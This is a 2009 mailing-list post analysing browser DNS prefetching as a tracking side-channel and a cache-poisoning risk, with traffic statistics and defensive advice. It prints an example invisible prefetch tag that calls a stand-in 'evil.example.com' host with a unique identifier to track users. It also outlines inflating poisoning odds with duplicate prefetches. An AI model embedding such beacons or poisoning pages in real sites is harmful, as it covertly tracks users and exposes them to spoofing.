[dns-operations] DNS pre-resolution

Sat Dec 5 22:21:43 UTC 2009

On Sat, Dec 05, 2009 at 06:49:30AM -0600, Jorge Amodio wrote:

> Andrew is assuming that chrome will lookup the dns name for every
> single URL on a page, I believe Roskind on the video said it was not
> as simple as that, also the response could be cached somewhere and
> the query never hit his servers.

If domains in each page are unique (e.g., specific to the session or
just hash of the IP), then caching is not an obstacle:

 <link rel="dns-prefetch" href="http://${UNIQUE_IDENT}.evil.example.com/">

Many readers of this list have invented similar solutions, e.g., to
probe for open recursives.  And there are patent applications for web
bugs, and many older implementations of such schemes.  When building a
DNS tracking system, it is not hard to overcome caching.

> After seeing the video I was playing a little bit (I use chrome as
> my default browser) looking at the query log of my local bind
> caching server and I can see on the log how my desktop machine sends
> the queries for some names but not all, even if I hover over some
> URLs.

DNS prefetching is a side-channel (or a type of covert channel).  The
resolution behavior is automated and controlled by the remote website.
Users (the people leaking information) have a few boolean controls to
turn prefetch off.  It is on by default.

There are actually three types of prefetching, across the various
browser implementations:

  a) "DOM-based speculative resolution" occurs when a browser or
     similar rendering engine loads a webpage.  I.e., it looks up
     most of the links on a page.

     Mozilla (FF 3.5+, and an earlier plugin for FF 3.0) uses an
     opt-out approach for this feature.  It is on by default, and
     toggled by setting the preference "network.dns.disablePrefetch"
     to true.  The prefetching of domain elements founds in HTTPS
     documents is turned off by default, however, and can be toggled
     on (e.g., for a honeypot deployment, or turned on by malware) by
     merely setting the preference network.dns.disablePrefetchFromHTTPS 
     to false.

     HTML can also control this, and have their web page opted out of
     prefetching.  For this, a new meta element is recognized by
     Firefox (and Chrome, etc.):

     <meta http-equiv="x-dns-prefetch-control" content="off">

     Instead of polluting a page with hrefs (which burden rendering
     engines) spammers and trackers can just populate web pages with
     invisible link tags:

     <link rel="dns-prefetch" href="http://${UNIQUE_IDENT}.evil.example.com/">

     At least in Firefox, the network.dns.disablePrefetchFromHTTPS
     rule trumps all 'link rel' prefetch instructions.

     There evidently was no public design/discussion of this feature,
     at least that I can find.  More details were announced at:

     https://developer.mozilla.org/En/Controlling_DNS_prefetching

     I assume we'll find out the hard way what the creative hackers
     can do with this new side-channel.  The blogs have suggested
     webmail delivery tracking for non-https users.

     I can think of one more use.  Since FF 3.5 does not appear to
     perform duplicate suppression in prefetches (generating multiple
     prefetches for the same qname), it opens a birthday window for
     poisoning.  (E.g., a page with a thousand duplicate 'link rel'
     prefetches is millions of times more likely to be poisoned.  See
     http://www.isoc.org/isoc/conferences/ndss/09/pdf/15.pdf for
     discussion.)

     I've only tested with with small N, but each duplicate doubles
     the chances of an attacker's random guess.  In pragmatic terms,
     this threat is mitigated by the low-yield from poisoning a single
     browser (1 attack == 1 victim, in most cases).  Plus, remote
     reach to the stub is often blocked by NAT, etc.  I know that Dan
     Kaminsky has stated that poisoning of the stubs is also a serious
     concern, so perhaps he or others will expand upon this FF
     feature.

     Poisoning aside, there is a real opportunity to track users.  If
     you are a web developer, I would urge the addition of '<meta
     http-equiv="x-dns-prefetch-control" content="off">' tags,
     particularly when handling 3d-party content such as text sourced
     from user input or advertising networks.

     Normally, to track users with image bugs, one has to buy ads and
     pay for the clicks.  One can potentially use web-bugs as a
     cost-free, click-free way to track user rendering of a page.
     Perhaps prefetching is being made smarter (context of DOM-aware
     fetching) in more recent browsers.

  b) "State-based speculative resolution" occurs when an application
     experiences a major state change.  For example, Chrome resolves
     your top N favorite domains on startup.  N is thankfully small.
     It seems Safari does this as well.

     As a practical matter, I think N has to be small, as anyone who
     has attempted to sync resolve large numbers of domain names can
     tell you.  Even if done async, 3 second timeouts are inevitable
     in large, batch resolutions, taking up valuable queue space in
     the local recursives.  I speculate therefore that browser
     engineers are unlikely to make N very large; it may sometimes
     give the appearance of being slow.

  c) "Partial input speculative resolution" occurs when the browser
     interprets user input before completion.  For example, if you are
     typing in the location bar, the browser may attempt to resolve
     substrings in input field, before one has finished typing the
     full domain name.  (This uses 'effective TLDs' as a heuristic, so
     that not every possible substring is resolved.)

     I believe this is a pernicious type of resolution, since
     substrings are resolved, and 'losers' in the lexical lottery will
     include the authorities for .co (the substring for .com) and .ne
     (the substring for .net), among others.  Chrome does this type of
     resolution (v.3, v.4, and ChromeOS).

     Ads that include a domain name are the most likely candidate for
     typing (since the user lacks a bookmark), and most of these would
     end in .com, I suspect.  So right now, chrome users are sending
     spurious lookups to .co and other authorities (likely .ne).  With
     only ~2% of the browser share, this might not matter.  I am
     concerned that when a million monkeys using IE have partial input
     speculative resolution, and type in domains ending in .com, the
     volume might be significant.

     From a university backbone, here are the most popular authorities
     for substrings that would result in non-useful prefetches:

      .ne    37.1%
      .co    22.6%
      .cz    8.7%
      .arpa  8.0%
      .ga    7.3%

     Note that these are TLDs for valid fqdn substrings for all qnames
     over a 2 month period, not just those that where a user actually
     typed something.  So the results are not representative and
     likely reflect local bias (e.g., .ga is a substring in
     ".gatch.edu", which is commonly typed in the local network.)

     But some 95% of all qnames had some valid fqdn substring (mostly
     because of .co/.com).  It is not know what portion of that
     traffic would come from user-typing, as opposed to bookmarks and
     DOM-driven resolution.   A study is underway.

     Judged by more local standards, I personally find it obnoxious
     that my browser sends a DNS query to China and Columbia, all when
     I type in www.cnn.com.  The typed domain is parsed by the
     prefetch engine as (((wwwn.cn)n.co)m'\n'), or graphically:

     +----------------------------+      Each box contains a valid
     |    +------------------+    |      fqdn, and all are prefetched
     |    |  +--------+      |    |
     |    |  | www.cn | n.co | m  | '\n'
     |    |  +--------+      |    |
     |    +------------------+    |
     +----------------------------+

     But that's just my preference to not send unwanted traffic, were
     possible.  If I ever own a .co domain, I would also find it
     obnoxious if other browsers sent queries to my authority based on
     partial input.  Some DNS operators might be indifferent to the
     spurious lookups, or want such traffic.

     So if the costs are unknown, or relative to the zone owner, let's
     consider the benefits of prefetching.  The stated improvement of
     prefetching is, by Chrome's own numbers, some where between 4% to
     10% improved speed, on the order of tens of milliseconds.  I
     honestly don't know what to make of such a statement, which seems
     to defeat itself.  Perhaps the western world's need for rapid
     loading of "LOL cat videos" trumps any concerns about the
     implicit cost transfer in this arrangement.  (That is, assuming
     unlucky authorities ever need more secondaries to handle the IE
     population, if it performs Chrome-style resolution.)

     I don't know if the .co authorities have seen a measurable
     increase in traffic, with only ~2% of the browsers running
     Chrome.  It may be hard to measure against the natural growth of
     Internet traffic in general.  But exponential growth (a plateau
     that cannot otherwise be explained in comparison to zone size
     deltas) would be one thing to look for.

     Perhaps someone associated with .co's authorities can share that
     information.  If traffic increase is measurable, one can estimate
     the burden when most of the browsers switch.  IE makes up, what,
     60% of a billion desktops?  Surely that's a lot of typing.  This
     is all speculation.  But if DNS typo correction is a
     multi-million dollar industry, then browser input is significant.
     I think this is worth worrying about.

     Lastly, even if the volume of traffic not large, there might be
     many domainer business opportunities around buying substrings of
     domains.  (E.g., someone might buy 'www.cnn.co', and find some
     clever way to monetize the unwanted lookups.)  If so, then
     perhaps registrars for collision TLDs will enjoy a windfall.

Perhaps my concerns are overstated.  I only know from history (e.g.,
DNS pinning attacks) that whenever browsers add innovative DNS
features, a wave of attacks follow.  I realize the browser authors are
fine, honest people who only want to improve user experiences.  And
besides the covert channel aspect, DNS prefetching is very clever---if
only we can determine the appropriate context for its use.

The process browser developers use to test ideas (blog announcements,
not IETF), requires that the cost of bad design be carried by others.
This is true of DNS prefetching.  I hope DNS is not the latest battle
field for the browser wars.

-- 
David Dagon              /"\                          "When cryptography
dagon at cc.gatech.edu      \ /  ASCII RIBBON CAMPAIGN    is outlawed, bayl
Ph.D. Candidate           X     AGAINST HTML MAIL      bhgynjf jvyy unir
Georgia Inst. of Tech.   / \                           cevinpl."